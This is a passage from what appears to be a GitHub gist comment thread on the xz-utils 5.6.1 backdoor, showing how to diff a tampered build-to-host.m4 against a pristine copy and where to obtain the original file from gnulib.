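printf 'AC_DEFUN([gl_BUILD_TO_HOST], [...])\ninjected_line\n' > "$tmp/modified.m4"

# --no-index makes git diff compare arbitrary files, no repository needed.
# git diff exits 1 when the files differ, so `|| true` keeps the script going.
git diff --no-index "$tmp/original.m4" "$tmp/modified.m4" || true
rm -rf "$tmp"
```

The output marks the added line with a leading `+`, which is exactly how the injected portion of the tampered build-to-host.m4 shows up against the pristine copy. Plain `diff -u old new` works equally well if you prefer not to involve git.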

@Chestnuts4

xz-5.6.1

Where can I download the original build-to-host.m4? I got xz-5.6.1.tar.gz from GitHub.

@thesamesam
Author

thesamesam commented Apr 6, 2024

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get this from gnulib. It might be in /usr/share/aclocal on your system if you have recent gettext installed too.

@Chestnuts4

@thesamesam thanks for your reply, I got the original build-to-host.m4 from GitHub and successfully diffed it
